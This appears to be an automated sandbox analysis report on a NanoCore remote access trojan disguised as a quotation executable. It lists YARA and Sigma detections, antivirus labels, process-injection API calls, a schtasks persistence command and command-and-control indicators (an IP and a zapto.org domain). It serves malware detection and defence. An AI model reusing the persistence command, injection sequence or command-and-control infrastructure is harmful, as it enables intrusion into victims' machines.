18.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.RegAsm.exe.68a0000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
4.2.RegAsm.exe.68a0000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
4.2.RegAsm.exe.68a0000.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.RegAsm.exe.5940000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
4.2.RegAsm.exe.5940000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
4.2.RegAsm.exe.68a0000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
4.2.RegAsm.exe.68a0000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
4.2.RegAsm.exe.68a0000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 19 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 6916, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 6916, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp', ProcessId: 7012

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: Quotation ATB-PR28500KINH.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	Avira: detection malicious, Label: TR/AD.Nanocore.bbyez
Source: C:\Users\user\AppData\Roaming\5thncv	Avira: detection malicious, Label: TR/AD.Nanocore.bbyez

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\5thncv

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: Quotation ATB-PR28500KINH.exe

ReversingLabs: Detection: 27%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.507695159.0000000003291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\5thncv	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Quotation ATB-PR28500KINH.exe

Joe Sandbox ML: detected

Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 18.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.RegAsm.exe.68a0000.4.unpack	Avira: Label: TR/NanoCore.fadte

Source: global traffic

TCP traffic: 192.168.2.5:49726 -> 194.5.97.9:6184

Source: unknown

DNS traffic detected: queries for: kengeorge.zapto.org

Source: RegAsm.exe, 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.507695159.0000000003291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.RegAsm.exe.5940000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Quotation ATB-PR28500KINH.exe

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C1D7F NtOpenFile,NtCreateFile,NtWriteFile,	0_2_059C1D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C00AD NtOpenSection,NtMapViewOfSection,	0_2_059C00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C1C09 NtDelayExecution,	0_2_059C1C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C1C2B NtQueryInformationProcess,NtOpenFile,NtAllocateVirtualMemory,NtReadFile,	0_2_059C1C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059D00AD NtOpenSection,NtMapViewOfSection,	0_2_059D00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059D1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	0_2_059D1C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C1D7F NtOpenFile,GetMessageA,NtCreateFile,NtWriteFile,	5_2_057C1D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C1C2B NtQueryInformationProcess,NtOpenFile,NtAllocateVirtualMemory,NtReadFile,	5_2_057C1C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C1C09 NtDelayExecution,	5_2_057C1C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C00AD NtOpenSection,NtMapViewOfSection,	5_2_057C00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057D1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	5_2_057D1C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057D00AD NtOpenSection,NtMapViewOfSection,	5_2_057D00AD

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_010270C9	0_2_010270C9
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_01799620	0_2_01799620
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_017904F0	0_2_017904F0
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_017904E1	0_2_017904E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0315E471	4_2_0315E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0315E480	4_2_0315E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0315BBD4	4_2_0315BBD4
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_00CE70C9	5_2_00CE70C9
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_016A9482	5_2_016A9482
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_016A04E1	5_2_016A04E1
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_016A04F0	5_2_016A04F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0544E471	18_2_0544E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0544E480	18_2_0544E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0544BBD4	18_2_0544BBD4

Source: Quotation ATB-PR28500KINH.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5thncv.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HJdyTuap.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Quotation ATB-PR28500KINH.exe, 00000000.00000003.469467692.0000000004F15000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameBHERuwclNdxgvdjq.bounce.exe4 vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.514669635.0000000006A70000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.514669635.0000000006A70000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.515184056.00000000079F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000005.00000002.516060257.0000000004CDE000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameBHERuwclNdxgvdjq.bounce.exe4 vs Quotation ATB-PR28500KINH.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior

Source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
